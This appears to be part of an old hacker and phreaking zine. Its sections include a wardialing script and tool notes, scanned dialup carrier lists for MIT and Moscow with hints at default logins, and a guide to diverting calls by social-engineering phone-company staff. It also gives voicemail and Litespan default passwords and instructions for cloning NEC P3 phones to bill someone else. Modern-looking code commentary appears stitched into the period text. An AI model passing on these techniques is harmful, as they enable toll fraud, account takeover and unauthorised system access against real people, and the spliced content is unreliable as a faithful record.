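    """Send one AT command; the trailing CR is what makes the modem act on it."""
    modem.write((command + "\r").encode("ascii"))
    return read_result(modem)


def hangup(modem):
    """+++ escapes to command mode (after the guard time), ATH drops the line."""
    modem.write(b"+++")
    read_result(modem)
    return at(modem, "ATH")


def scan(modem, npa_nxx, start, end, randomize=False, seed=0):
    """Dial npa_nxx-start .. npa_nxx-end; return (connects, log lines)."""
    if at(modem, "ATZ") != "OK":
        raise RuntimeError("modem did not answer ATZ with OK")
    suffixes = list(range(start, end + 1))
    if randomize:                       # pseudorandom order, as the article says
        random.Random(seed).shuffle(suffixes)
    connects, log = [], []
    for n in suffixes:
        number = f"{npa_nxx}{n:04d}"
        code = at(modem, "ATDT" + number)
        log.append(f"{number} {code}")
        if code == "CONNECT":           # only a completed data connection says this
            log.append(f"*** CONNECT *** to 1-{npa_nxx[:3]}-{npa_nxx[3:]}-{n:04d}")
            connects.append(number)
            hangup(modem)
    return connects, log


def sample_modem():
    """Constructed exchange 555-012: two carriers and one busy line."""
    return FakeModem(carriers={"5550120005", "5550120012"}, busy={"5550120001"})


if __name__ == "__main__":
    found, lines = scan(sample_modem(), "555012", 0, 20)
    print("\n".join(lines))
```

read_result() is the part worth keeping when the fake is swapped for a real port: a modem interleaves blank lines, command echo and the "CONNECT 9600" banner, so matching on the leading result keyword rather than on an exact line is what keeps the loop from hanging.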
You can use local or long distance, although international numbers haven't
been added at this time (not hard to do, I just didn't care to add an extra
scanf and an extra CountryCode variable ;)

About ShokDial (its temp name for now)
--------------------------------------

This supports random scanning (pseudorandom to be honest, heh) and sequential
(the range you specified and up) scanning. You can give it a range too, but
that still runs under sequential scanning. To use random scanning use
'shokdial -r', otherwise it will by default use sequential scanning. For the
other options type 'shokdial -h'.

You want to keep track of the version, because I'd almost guarantee this
program is going to continue changing. I need to add some ncurses GUI effects
(heh) and a function to resume scanning, for those of you who are too lazy to
even look at the (by default) wardialer.log, get the last number it dialed
(assuming you used sequential scanning) and enter that as the scan number to
begin on!

It will output to wardialer.log and to the screen. If you have BEEP = WANTBEEP
in the Makefile, it will beep when it connects to a host.

That's about all I really have to say about it. I don't actually use war
dialers (really), so I haven't actually tested this (sorry if there are any
problems, but there shouldn't be).... if you do however find a problem, please
let me know! I will fix it and send out a patched version..... you can get all
of them from ftp.janova.org or www.janova.org.

Enjoy ;)

Shok

2. More MIT dialups : zer0x

In CRH issue #5 I listed the MIT guest Terminus dialups, which you could use
to telnet from. Here is a different one...

1. MTL Terminal Server
----------------------------------------------------------------------------

Here is a 'private' telnet dialup, no 'guest' access allowed, unlike Terminus.
It may go down or have a password added to it if they notice all this extra
access.
MTL Terminal Server (mtl-ts.lcs.mit.edu)

    258-7626
    258-7623

----------------------------------------------------------------------------

2. I have scanned the MIT prefix and here are some of the carriers I have
found. I'm not sure what this can really be useful for, except maybe to know
the dialup number if you ever own one of these machines. Or who knows, maybe
one of the default logins works for one of these machines, [hint hint ;)]

258-7279  nastasia                          (os:unix)  [nastasia.mit.edu]
258-7934                                    (os:unix)  [unknown host]
258-7238  bozo phone login:                 (os:unix)  [bozo.mit.edu]
258-7780  servi login:                      (os:unix)  [unknown host]
258-7967  mit center for space research     (os:unix)  [hoku.mit.edu]
258-7936                                    (os:unix)  [host: unknown]
258-7838                                    (os:vms)   [host: unknown]
258-7108  Annex Command Line Interpreter for Annex Reuter
258-7958  (MIT Center For Space Research)   (os:unix)  [grall.mit.edu]

----------------------------------------------------------------------------

NOTE:
-----

Maybe there were a few machines I didn't put down, possibly because they were
important to me and I did not feel like disclosing them. Maybe I will place
them in later issues, who knows.

Scanning colleges is always fun because you find neat stuff. Some machines
even have outdial modems attached to them :) A good way to find stuff like
that is to find the prefix that a uni puts their machines on and scan scan
scan. Also a big company may have plenty of machines sitting there waiting for
you to find and own. Some people may think that scanning is a bit outdated,
but it comes in useful. I suggest you use ToneLoc if you wish to scan, since
it is the best DOS scanner. For Linux use Shok's scanner (ShokDial), which is
in this issue.

3. Hiding within the system : efpee

"w1ll i ever g3t caught....."

"Guess what !@#$ i figured it out.. i can finally ani sp00f with
32.666.666.666 hz tone," - " unkn0wn person

I get sick and tired of people...
in general explaining to me how fucking kewl it is to go down to a payfone, and make generous calls with a redbox. I find that shit so annoying.. I know the majority of the people reading this are gonna say.. "y0 3y3 JUST R34D 2600 and 3mm4nu3l t0ught m3 b0ut inb4n signalling 4nd h0w to bu1ld a r3db0x.." - unkn0wn person The main reason anyone ever walked to a payfone in the first place was really to lesson the chance of being "..traced.." Let me tell u dumbfucks.. ani is everywhere so dont think just cause u c4n g0 to a payfone u are not gonna get caught.. oh.. btw.. ST0P BU1LD1NG R3DB0X3Z using pbxz, and k0d0ez!#@%$ is less painless, and doesnt cost u m0ney!@#$ . sektion 1 . Diverting has been around since the days of the Capn' Crunch and h1s fux0ring wh1stle. To bad.. if u even want3d to attempt to d1vert with blueb0xing u end up using 800 direct numberz to countries such as gr33ce. Th1s is all g00d.. but again.. A B1TCH. Cause w3 dont all h4ve blueb0xes.. and n0t everyone has a laptop to carry round with onkels little bluebeep. the only th1ng bout that program that was good was the neeto ascii/ansi art. Anyway.. when u think of diverters wh0 comes to mind? AT&T - = - ani is dr0pped wh3n diverted to through intercept op MCI - = - these are the g00d guyz :P W0RLDC0M - = - p4yf0ne please OCI - = - these stup1d sp1cs have ani n0w :( TELTRUST - = - <----------- th3 supr3m3 in my l1f3 :) Teltrust has nifty little backd00rs that allow u to access operators usually only allowed through dialing 0 on a teltrust serviced. i c4nn0t release th1s t0p s3kr3t enph0.. but its out there.. Op back doors are hard to find but... then again u have all the time in the w0rld. th1s is m33 4nd my teknique... mee ------> operator -----> vmb with 800 dialout ---> meridian -----> at&t ------> 911 b4ckd00r ----> c0pz pull up 0utside so1o's house... eyem gonna take u through my easy st3p plan of h0w to d1vert fr0m home, and seldom get caught.. 1. Oldskewl stealing of service fr0m neighbor 2. 
C4ll f0rw4rding st1ll 0wns u.. and if u kn0w much bout switches ;) th1s can aid u greatly in diverting.. Setting up your own diverters w1th c4ll f0rwarding is th3 m0st safest sh1t, cept... please divert wh3n owning your local sw1tch... unless its us west.. they d0nt have ani @#!#$!@#$ i swear ( well i w1sh ). h3r3z l33t pr0ceedure f0r adding call forwarding under 1a. RC:CFV:\ add1ti0n of f0rwarding features ORD 1\ sp33d of activation :) 1 = n0w damn it BASE XXXXXXX\ th3 l0cal number u are add1ng features too TO XXXXXXX\ route to where? 801 855 3326 "y0u h4ve r3ached bah" PFX\ s3t pr3f1x 1 if ld dialing.. although i believe 800 is possible ! execute damn it.. my l0cal switch being 1a.. dats all eye deel with.. but... 5e becomes easier d0 to the fact that if u have access to recent change channels on a 5e.. or rcmac sk1lls.. u can easily add forwarding... The 5e rc/vfy is s0 much simpler... its call3d w1nd0ze 5e.. with neet little ascii menus.. If y0u are n0t an rcm4c w1z... The business office werkers are clueless.. i use uswest as my example m0stly d0 to them being my rb0c.. but anywayz. me> dials 18002441111 (servicing for home usage) automated attendant> Enter Area C0DE and 7 digit number me> 3608646226 <--------ex girlfriendz aa> real attendant.... c0uld u please give me seven digit number u are calling about please g1ve it t0 real attendant. me> uh yes 3608646226 ra> h0w can i h3lp u Mr J0hnson. me> w3ll ummm uh me and family are going out of t0wn for a week.. me> i w4z wondering if u c0uld add f0rwarding or f0rward all my calls to me> 8018553326 . . . . . sure th1ng mister j0hnson.. they w1ll then say.. ra> th1s feature will be online by 5:00 tomm0row nite.. me> U SP1C 0F 4n Op U D!dnt ASK f0r Any ID!@#$ bahahahahh 0wned . sektion 2 . voice mail systems have been around for ever... all had oftered the same benefits under systems such as audiotext, audix, asp3n and older systems. these days the p0ssibilites are endless. some of the newer syst3ms.. 
that unf0rtunately i dont have actual hard copy f0r.. carry newer features... this includes b0x forwarding, pager n0tification, c4ll f0rwarding, and message f0llow mee.. for inst4nce... dial 1800xxxxxxx

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Back to basic vmb hack1ng

these new little systems include pr0mpts such as enter box number and password.. this rem0ves the ease and makes it almost impossible to hack. Yes.. search f0r systems u kn0w have outdial capabilities

9999 is still the admin b0x
9999 is still the most common used password

Newer systems are adding l0nger k0dez.. and sumtimes only codes but no actual box number. anyway.. h0w can this help u in diverting..? After u have owned vmb with 800 access? well simple really.. it can be used f0r number of things.. dialing att mci and maj0r ld companies f0r ld purposes totally legit of course.. The pager n0tification feature owns me.

herez the tekniq

call business office.. like in above insert and add call forwarding to a fone or number u kn0w never gets called.. forward it to an0ther number.. have that number forwarded.. at the end of chain .. put your pager number :) n0t like this isnt obvious or anything.. they just c4nt pr0ve nuffin. its neet to listen 1800864BLAH call my pager after bouncing through all these neet forwarded numbers and hitting the "u have reached a pagenet serviced pager... please leave numeric message at the tone, and hit star when finished."

I just wanna make aware things people have forgotten about.. people spend too much time worrying bout " the switch, rcmac, nac, scc " and all the nitty gritty of a boc. Think of what can be done without even hassling..

. pbx .

u have read billion txt files on pbxs.. i just recommend reading cavalier's. bah hit *9 or dial one of those nifty 800555xxxx pbxs with 2 digit codes.. oh btw.. th0se ones are probably traps for defcon kids.

. sektion 3 .

my thoughts on tracing... listen.... in our day and age.. it is very easy for u to be traced..
the thing is, cdma, wireless, broadband, cellular communications is aiding us. If u have a modded oki with antitriangulated mods plus b1llion pairs..? WH0 ARE THEY TRACING .. the ani .. is always there. ani failures.. yes.. likely to happen every once in a while when tw0 sw1tches d0nt c0mmunicate .. but g0d damn people.. anyway.. th1s f1le pr0bably did nuffin for your clooless self.. but maybe spawned a couple ideas in your head such as efpee diverting diagr4ms

mee -> oki -> pbx with intercept opt access at *9 -> opdivert -> vmb with 800 dialout -> teltrust -> k0d3z -> pbx -> sekret service in 206

"TR4C3 TH1S MUTHA FUCK3R"

I typed in 30 minutes without leet speek filter.

4. An introduction to LightSpan 2000's : dlc

1 : The Basics.
---------------

This article is going to be broken up into 3 parts for convenience. Here is the first; if you don't understand this, don't move on. Also if you don't need to know anything about Litespans don't bother reading this act of masochism.

A Litespan 2000 unit is a Synchronous Optical Network (SONET) based Optical Loop Carrier (OLC) system. It provides the function of four separate systems combined into one. Those systems are as follows:

Digital Loop Carrier (DLC). Provides 2,016 DS0s of bandwidth for delivery of services such as data, coin, or dial tone.

Digital Cross Connect System (DCS). Takes apart DS1 signals into DS0s, rearranges them and puts them back into DS1 signals. This is known as 1-0-1 cross-connect.

SONET Fiber transport system. Uses lightwave technology and the SONET protocol to transport signals between Litespan terminals.

Multiplexer (MUX). Takes multiple low speed signals (DS0s, DS1s) and interleaves them to form a single high speed data stream at SONET bit rates.

2 : System Security.
--------------------

Litespan 2000 unit security is very simple, but considering its accessibility by outside systems, it is adequate.
If you ever get access to a Litespan 2000 terminal or are able to access it remotely this may help. The Litespan provides two levels of security to maintain system integrity. These security levels control who can access the system and what the authorized user is allowed to do in the system. Each authorized user is assigned a set of privileges that determine the actions allowed to the user. The Litespan maintains an internal list of authorized user IDs, passwords, and user privileges. There are up to 20 users possible.

Now to access security you will be prompted for a User ID and a password at a terminal that looks much like this :

OMAPS Log In
OMAPS V05.01.05
Copyright 1997 Optlink Corp. All Rights Reserved

User Id:
Password:

Now for the ball busting part. If you repeat the login procedure incorrectly 5 times you will be locked out of the system, so guessing passwords is out; what you get is five tries at the defaults. Also the user IDs can be up to 20 characters, numbers or letters with both upper and lower case; this is the same with the password. The Litespan has a sysadmin like in a unix system, but the Litespan admin usually has a long beard and a smug expression. But it is possible that a dumb sysadmin will leave in the default logins/passwords. Those are as follows:

User ID: optlink    Password: optlink
and..
User ID: sysadmin   Password: sysadmin

...Well that gives you a look at System Security from the outside. Look at part 3 if you were able to get in. It gives a run down on User Privileges.

3 : User Privileges.
--------------------

Well user privileges are important; the sysadmin maintains a file in the system that gives different users different privileges. The user privileges file will be set up somewhat like this:

User Id   Password   CP M M0 M1 N NR P PR P0 P1 S T
Fatass    *****      x x x x x x
BigBone   *****      x x x x x x

That is a basic layout. The CP, M, M0 etc. are privileges. The X's are basically checks allowing a certain user to perform a certain act in the system.
The different privileges are as follows:

CP = Allows someone to change the user ID, password or privileges of any user on the system. This is one of the sysadmin's privileges for the most part.
M0 = Maintenance privilege (DS0 only)
M1 = Maintenance privilege (DS1 only)
MR = Maintenance READ ONLY privilege
N  = Network Administrative privilege; allows backup and restore of database
NR = Network Administrative READ ONLY privilege; allows access to network information
P  = Provisioning privilege; necessary to make changes from the provisioning menu
P0 = Provisioning privilege (DS0 only)
P1 = Provisioning privilege (DS1 only)
PR = Provisioning READ ONLY privilege
S  = System Administrative privilege; necessary to make changes from the administrative menu
T  = Testing privilege; allows execution of testing commands

Well that about wraps it up. I may in the future update this, but I doubt it. Look for future papers by me.

dlc

5. An introduction to the NEC P3 : daxx

The NEC P3 is a rather old mobile phone for use on any TACS or E-TACS cellular telephone system (there is a list at http://c5.hakker.com/nec_p3/ to find out where there are such networks; they exist in Europe, Austria, Italy, the UK and Ireland). This phone was quite popular a few years ago, so you should be able to pick one up used for little money. I got one including two batteries & a charger for 50 IEP.

Now, what makes this phone so interesting? The availability of a so-called Test-Mode-ROM for it! Like all mobile phones, this one has a read-only-memory chip in it, which contains its software. This program is started when you turn on the phone; it could be compared to a computer's operating system. While the "normal" version of the NEC P3's software allows you to do no extraordinary things, basically only to place calls to a number you enter and to store numbers along with names, the test-mode software lets you go into test mode, where you can do many cool things...
Most importantly, you can change all the information in the phone's NAM (number assignment module) - the ESN (electronic serial number) and the MIN (mobile identification number). These two numbers are all there is to an E-TACS phone's identity - program in another phone's ESN & MIN (this information is called a pair) and your NEC P3 becomes a clone of it. You will be able to make calls on the bill of the phone you cloned and to receive calls under its number. On a test-rom NEC P3, this process of reprogramming the NAM takes less than a minute of pressing buttons on the keypad, and requires no connection to a computer with a "chipping lead", as the vast majority of mobile phones do. However there are plans for a computer-to-P3 cable, along with chipping software; both are available on Dr. Who's Radiophone, which is now at...

http://radiophone.dhp.com/nec/p200.html

The MIN prefix for Ireland's 088 network is 2720 (088-2 = 2722, 088-6 = 2726). So if somebody's number is 088-313371, their MIN, and what you type in while programming, is 2720313371. The ESN of a phone (an 11 digit number with slashes dividing it) can almost always be found on a sticker on the back of the phone, under the battery. So if you see someone's phone lying around, just note down those numbers, put them in your P3, and mess up their bill.

In test mode, you can also scan all channels (listen in on calls going on in your area), and break into conversations (can be funny; the call has to be on a very nearby cell for that to work though). I've also put on a text which describes how two P3's can be used as CB radios, without actually using the cellular network (never done this myself, can anybody confirm that this works?).

You have a P3, and would like to put a test-mode ROM in it? Taking the actual chip out of the phone, or putting one in, can be tricky, the first and biggest obstacle being "tamper-proof" screws in the case. However pliers with very thin ends worked OK, once I found suitable ones.
The complete instructions for doing this can also be downloaded below. Getting the test-mode software (see below for the image file) written on the existing ROM chip from a P3, or getting a new 27C512 (200 nanoseconds access time) EPROM with the software on it, is probably the most difficult part. You could try some electronics companies or university electronics labs, or any other place which might be able and willing to write an EPROM for you. This only takes a minute, but a previously written EPROM has to be erased by exposure to UV light before being re-written, which takes at least half an hour.

Further files are available from http://c5.hakker.com/nec_p3/

There's an easier way to get into test mode than the one. As you can simply store your ESN in one of the 99 memory slots once (enter 11 digits, STO (for instance) 68). Then every time you want to enter, you do RCL 68, STO 69, RCL *, RCL # 01 and there you are, instead of keying in the whole ESN every time.

So, go out, get a P3 or another kewl fone and have some fun while the E-TACS networks are still on the air!

DaXX

6. More Russian dialups : Lirik

+7-095-913-xxxx Iskra(?) Telco scan for carriers (?) 1997 CyberLirik/DarkMoon with ToneLoc 1.x
comments to lirik@hotmail.com
also check out http://207.222.215.67/________.lst

9133087 MMTEL> .x to get RemoteAccess 2503107111 .m to connect to MFD PAD NUA format : NUA with DNIC ie MMTEL>2503107111
9133442 27*
9133440 36*
9133438 34*
9133437 33*
9133439 32*
9133994 login:
9133340
9133465 CONNECT 2400/NONE
9135899
9133353
9133467
9133094 MICRON: ADDRESS?
9133093
9133487 MS DOS 6.20 :)(krug.partya.ru) ((null)) login:
9133118 S'Ad;r+kE:q't`aqQ1<8;
9133507 *****************************
9133127 Port 1 login:
9133392 ROSPAC(IASNET) Local Dial Ups 02500 DNIC also TYMUSA [unpublished] ntymusa .concert+ for TYMUSA
9133578 HqS$=x1*M!J>8uF
9133336 0211  &v3  &v3  &v3  &v3  &v3+++
9133327 +++
9133418
9133297 BSDI BSD/386 1.1 (berenduin.comdiv.inkom.ru) (ttyb6) login:
9135745 FrontDoor 2.02; Noncommercial version
9135741 see Nodelist for more systems
9135611 ( 913- & Iskra2 like 097-3xxxx)
9135644 2:5020/439@Fidonet
9135982
9135903
9133478
9133503
9136066
9136007 2:5020/194@Fidonet
9136347
9132354
9137134
9139888
9133414 0211 iCv3 iCv3 iCv3 iCv3 iCv3+++
9133117 PPP trash ~~}#@!}!Q} }4}"}&} }*} }
9134214
9135937
9133514 Welcome to SCO UNIX System V/386 Release 3.2 psl055!login:
9133038 Welcome to Linux 2.0.29. **EMSI_REQA77E
9133379
9133119 S'Ad;r+kE:q't`aqQ1<8;!nPSHHNrkShD
9133161 vBB Pl[EBad_Ver<
9135307
9136142
9136254
9135308
9135797
9138590
9137100
9138569
9137177
9136227
9133944 (gamma!uugate3) login: www.gamma.ru ISP
9132071
9133344 Telebit's NetBlazer Version 2.3 NB_CROCUS login:
9134392 ~?[l~m^p.:$KJ'b4f4wB&9uJ@0@abfD4*
9134217 Login: PassWord:
9134257 INCOM_ZNANIE
9134228 Welcome to X Atom Network
9134091 Sorry no BBS avalable on this phone
9134092 atom.ai.x atom.net!login:
9134221 Welcome to FaxNet IP network Login:
9134114 "%$(b% a".% (,o :
9134419 ࢥ 㯠 䠩
9134418
9134488
9134489
9135864 Username: % Username: timeout expired!
9135865
9135856 Enter: M menu driver, A ANSI, else N >
9135898 WindowsNT 4.0 (credit.roscredit.msk.su) (tty00)
9135319
9135751 SpaceNet Dial Up Gateway Problems: noc@space.ru 333 3523
9135020 www.space.ru
9135619 ICAICAICAICAICAICAICAICA
9135627
9135652
9135651
9135618
9135622 ~?[l~~?[l
9135640
9135995 QuickMail(tm) Copyright 1988 95 CE Software, Inc.
9135706 **B0100000027fed4
9135966
9135883
9135820 faxnet10 login: Welcome to the INTERACTIVE UNIX Operating System from SunSoft
9135626 Moscow DAWN 2.Relcom.EU.net
9135747
9135624
9135870 User Access Verification
9135798 ~?{=~~
9135602
9135810 Welcome to the TECHNOBANK Client Bank System ! System name: techno
9135811 DIMON
9135641 Avtovazbank Guest/guest also x.25 NUA in Sprint 772855.1
9135621 USRobotics Courier HST Dual Standard V.34+ Fax Dial Security Session Serial Number 9909550000181645
9135941 ~}|{
9135821 BSDI BSD/OS 2.0.1 (iskra.msk.su) (tty01)
9135921 Please press ... Enter password:
9135082 ]w]w]w]w]w
9135799
9137143
9136077
9137184
9136371 russica!login:
9136265
9136259
9136319
9136258
9136223 FreeBSD (ns.irex.ru) (ttyx2) login:
9136236 Welcome to Moscow Government's Mail Server
9136233 Contact phones is 200 5382, 200 5935
9136234 mshost!login:
9136997 Registered users only. Anonymous access denied. login:
9136173 =CREDO BANK= Bldg. 2, 9 Sadovay Sukharevskaya St.
9136311 Telecommunication system of the
9136316 State Tax Service of Russian Federation
9136368 23, Neglinnaya str, Moscow.
9136369 X.25 0250021500600
9136284 ENTER YOUR NAME =>
9136313 PASSWORD =>
9136958 The system's name is globex. Welcome to USL UNIX System V Release 4.2 Version 1
9136953 +++e3td|t63@EBwN,(qECKt3BY0C4x
9136232 Trying 10.31.11.4 ... Open
9136242 ENTER YOUR NAME =>
9136210
9136304 BrakyTerm Mailer 0.01.9ESPM
9136395 .!`. /.& +." bl!
9136984 Russian Trading System (Telecommunication Center, Cisco 2511 1)
9137236 User Access Verification
9137228
9137248 Russian Trading System (node MSK_NCC) port 11(0)@
9137203 @
9137224 @HELP
9137211 @.uucp connected
9137218 @.CRT
9137213
9137243
9136175 ~HM
9136052 l'@kN,$?<~1!\_tj6Cv!DR})i@D@CrO0|6qZ73d
9139773 INCOMHOST
9133598 Network Access SW V1.5 for DS700 08 (BL95 33) ElecsBank DS700 8 Communication Server BRAVO>
9135815 p
9139234 ҍ
9137270 ଠ樮 ⢮ ࠫ쭮 ᥫ쭮 WWW cࢥ: WWW.molot.ru ᫨ ॣ஢, login: guest ()
9137166 Only for @MAIL (other NUAs do not work)

Sprintnet Local Dial-Ups 02501 & 03110 DNICs (GlobalOne = Sprintnet = Telenet): send "@D", send "d1" on the TERMINAL= prompt, type the NUA on the @ prompt (details http://207.222.215.67/x25.html)

9139936 PPP for enterprise customers GlobalOne
9133571 RosNet Dialup 02506 DNIC http://207.222.215.67/x25.html try 6100255 address
9132376 Russia@Online DialUp 30 lines
9138111 33.6 www.rinet.ru Login: guest

X3 (unknown) systems

9135646 9138173 9136024 9138294 9138453 9136235 9137012 9137231 9135705 9136093
9132252 9138365 9133551 9136046 9136082 9136235 9136034 9136370 9136021 9133498
9133069 9133241 9133916 9133021 9133918 9133398 9134009 9134239 9134425 9134421
9134422 9134094 9134069 9134560 9134218 9134258 9135951 9135364 9135922 9135177
9135088 9136457 9136498 9136239 9136185 9136139 9135381 9135705

7.
UK x.25 network numbers : Cold-Fire

AT&T Istel
----------
01224-582082 Aberdeen
01224-580217 Aberdeen
01970-611022 Aberystwyth
01904-430404 York
01522-512050 Lincoln
01292-289595 Ayr
01245-267167 Chelmsford
01295-272828 Banbury
01271-449281 Barnstaple
01203-552092 Coventry
01705-327575 Portsmouth
01223-314594 Cambridge
01232-661188 Belfast
01232-661733 Belfast
01533-750240 Leicester
01527-584546 Redditch
0121-478-0002 Birmingham
01604-230734 Northampton
0191-386-2822 Durham
0117-279139 Bristol
01202-530882 Bournemouth
01392-217071 Exeter
01742-729590 Sheffield
01273-206733 Brighton
01582-401887 Luton
01273-820236 Brighton
01733-555575 Peterborough
01782-289866 Stoke-on-Trent
01383-737557 Dunfermline
01272-279138 Bristol
012572-65571 Chorley
0117-279808 Bristol
01752-673352 Plymouth
01532-424111 Leeds
01223-323155 Cambridge
01463-243411 Inverness
0171-831-9097 London
01227-450941 Canterbury
01227-453502 Canterbury
01892-515580 Tunbridge Wells
01473-231631 Ipswich
01422-330585 Halifax
01962-844211 Winchester
01222-460888 Cardiff
01602-475161 Nottingham
01634-815055 Chatham
0181-965-7767 London
0141-566-3334 Glasgow
01452-307766 Gloucester
01245-492460 Chelmsford
01289-308668 Berwick
01633-244456 Newport (Gwent)
01302-340698 Doncaster
01492-517111 Colwyn Bay
01792-475533 Swansea
01743-241631 Shrewsbury
01734-351616 Reading
01302-200636 Dundee
01642-225226 Teeside
01865-749555 Oxford
0161-941-6319 Manchester
01482-446444 Hull
0151-691-1312 Liverpool

BT PSS Dialups
--------------
01232-331284 Belfast
0161-834-5533 Manchester
0171-490-2200 London
0151-255-0230 Liverpool
0121-633-3474 Birmingham
0117-211545 Bristol
01492-860500 Llandudno
01522-532398 Lincoln
01639-641650 Neath
0141-204-1722 Glasgow
01533-628092 Leicester
01463-711940 Inverness
0171-283-9123 London
0181-681-5040 London
01889-576610 Rugeley
01227-762950 Canterbury
01539-561263 Sedgwick
01424-722788 Hastings
01228-512621 Carlisle
0181-905-9099 London
01532-440024 Leeds
01865-798949 Oxford
01245-491323 Chelmsford
01654-703560 Machynlleth
01733-555705 Peterborough
01472-353550 Grimsby
01752-603302 Plymouth
01603-763165 Norwich
01202-666461 Poole
01793-541620 Swindon
01270-588531 Crewe
01772-204405 Preston
01734-500722 Reading
091-261-6858 Newcastle-on-Tyne
01582-481818 Luton
01872-223864 Truro
01709-820402 Rotherham
01895-846091 Warminster
0131-313-2137 Edinburgh
01926-451419 Leamington Spa
01732-740966 Sevenoaks
01602-506005 Nottingham
01392-421565 Exeter
01743-231027 Shrewsbury
01273-550045 Brighton
01422-349224 Halifax
01703-634530 Southampton
01242-227547 Cheltenham
01823-335667 Taunton
01597-825881 Llandrindod Wells
01553-691090 Kings Lynn
01222-344184 Cardiff
01642-245464 Middlesbrough
01473-210212 Ipswich
01223-460127 Cambridge
01904-625625 York
01224-210701 Aberdeen

Sprintnet
---------
0171-973-1030 London

Tymnet
------
0131-313-2172 Edinburgh
0181-566-7260 London
01223-845860 Cambridge
0117-255392 Bristol
01232-234467 Belfast

===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================

1. A short introduction to IPv6 : so1o

IPv6 addressing is described in detail in RFC 1884 (the protocol itself is RFC 1883); it is commonly noted as the "Next Generation Internet Addressing System". IPv4 had some shortcomings that became obvious once the internet had grown substantially in size and complexity; the main factor was that IPv4 used 32-bit addresses, whereas IPv6 allocates 128-bit addresses.

IPv6 address representation is much like that of IPv4, because the addresses are represented as strings of digits divided by separators, but IPv6 addresses differ in that they take the form x:x:x:x:x:x:x:x, where each x is the hexadecimal value (up to four hex digits) of 16 bits of the address. A single run of zero groups may be abbreviated to "::", so 1080:0:0:0:8:800:200C:417A and 1080::8:800:200C:417A are the same address. IPv6 also differs in more complex ways, but this is just an introduction... For the full details see RFC 1884.
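The textual rules above, worked through in code. This is an added example, not part of so1o's article: it expands the "::" shorthand into eight 16-bit groups, compresses them back (using the later RFC 5952 rule of collapsing only the longest run of two or more zero groups, since RFC 1884 leaves that choice open), and names the address type from the leading bits using RFC 1884's own prefix table (0000 0000 reserved, including :: and ::1; 1111 1111 multicast with its scope nibble; 1111 1110 10 link-local; 1111 1110 11 site-local; 010 provider-based unicast, a block later RFCs reassigned). Anycast addresses are deliberately absent from the classifier: RFC 1884 carves them out of unicast space, so they are indistinguishable from unicast by syntax. The IPv4-embedded form (x:x:x:x:x:x:d.d.d.d) is not handled.

```python
import re
from typing import List

# Multicast scope values from the low nibble of the second byte (RFC 1884 2.7).
MULTICAST_SCOPES = {
    0x1: "node-local", 0x2: "link-local", 0x5: "site-local",
    0x8: "organization-local", 0xE: "global",
}

GROUP_RE = re.compile(r"[0-9A-Fa-f]{1,4}")


def expand_ipv6(text: str) -> List[int]:
    """Parse x:x:x:x:x:x:x:x (with at most one '::') into eight 16-bit ints."""
    if text.count("::") > 1:
        raise ValueError("at most one '::' is allowed")
    if "::" in text:
        head, tail = text.split("::")
        head_groups = head.split(":") if head else []
        tail_groups = tail.split(":") if tail else []
        missing = 8 - len(head_groups) - len(tail_groups)
        if missing < 1:
            raise ValueError("'::' must stand for at least one zero group")
        groups = head_groups + ["0"] * missing + tail_groups
    else:
        groups = text.split(":")
    if len(groups) != 8:
        raise ValueError("an IPv6 address has eight 16-bit groups")
    values = []
    for g in groups:
        if not GROUP_RE.fullmatch(g):
            raise ValueError(f"bad group {g!r}")
        values.append(int(g, 16))
    return values


def compress_ipv6(values: List[int]) -> str:
    """Render eight groups as text, collapsing the longest run of >= 2 zero
    groups into '::' (RFC 5952 canonical form; leading zeros dropped)."""
    best_start, best_len = -1, 0
    i = 0
    while i < 8:
        if values[i] == 0:
            j = i
            while j < 8 and values[j] == 0:
                j += 1
            if j - i > best_len:
                best_start, best_len = i, j - i
            i = j
        else:
            i += 1
    hexes = [format(v, "x") for v in values]
    if best_len < 2:
        return ":".join(hexes)
    return ":".join(hexes[:best_start]) + "::" + ":".join(hexes[best_start + best_len:])


def classify(values: List[int]) -> str:
    """Name the address type from its leading bits, per RFC 1884 section 2.3."""
    first = values[0]
    if all(v == 0 for v in values[:7]):
        if values[7] == 0:
            return "unspecified"
        if values[7] == 1:
            return "loopback"
    if first >> 8 == 0xFF:                      # 1111 1111: multicast
        scope = MULTICAST_SCOPES.get(first & 0xF, "unassigned")
        return f"multicast ({scope} scope)"
    if first >> 6 == 0x3FA:                     # 1111 1110 10: link-local
        return "link-local unicast"
    if first >> 6 == 0x3FB:                     # 1111 1110 11: site-local
        return "site-local unicast"
    if first >> 13 == 0b010:                    # 010: provider-based (RFC 1884)
        return "provider-based unicast"
    return "unicast (other or unassigned prefix)"


if __name__ == "__main__":
    for addr in ("1080:0:0:0:8:800:200C:417A", "::1", "ff02::1", "fe80::1"):
        v = expand_ipv6(addr)
        print(f"{addr:28} -> {compress_ipv6(v):24} {classify(v)}")
```

The standard library's ipaddress module does all of this (and the IPv4-embedded forms) in production code; the point of spelling it out is to see the "::" rule and the prefix bits the article describes, and to reject the inputs (two "::", a ninth group, a five-digit group) that a hand-rolled parser in a daemon tends to accept silently.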
IPv6 has identified 3 types of address; these are unicast, multicast and anycast. Here is a neat ascii diagram to explain the 3 different types...

Unicast :
---------
                                                   Host 1
                                                   Host 2
IP Packet -------------------------------> Host 3
                                                   Host 4
                                                   Host 5

Multicast :
-----------
                                                   Host 1
                                           /------> Host 2
                                          /  and
IP Packet -------------------------------> Host 3
                                          \  and
                                           \------> Host 4
                                                   Host 5

Anycast :
---------
                                             /--> Host 1
                                            / or
                                           /------> Host 2
                                          /  or
IP Packet -------------------------------> Host 3
                                          \  or
                                           \------> Host 4
                                            \ or
                                             \--> Host 5

So that's basically what's so neat about IPv6; if you want to know the formats for the unicast, multicast and anycast addresses, then read RFC 1884.

Summary..
---------

IPv6 offers a more permanent solution, as it incorporates a flexible address space, as well as support for accessing the public internet and private IP-based networks from the existing enterprise LANs and WANs.

so1o

2. Newbie sk00l : so1o

This time we will learn how to use the find and cat commands effectively..

cat
===

usage : cat [options] [files]

options :
---------
-e : Print a $ to mark the end of each line
-n : Number the output lines, starting with 1
-s : Squeeze out extra blank lines
-t : Print each tab as ^I and each form feed as ^L
-v : Show control and nonprinting characters
-A : same as -vET (GNU cat; -e and -t also imply -v)

examples :
----------
cat ch1                : display a file
cat ch1 ch2 ch3 > all  : combine files to form 'all'
cat note5 >> notes     : append note5 to the notes file
cat note5 > notes      : overwrite notes with note5
cat > temp1            : create a file from the keyboard, end with EOF (Ctrl-D)
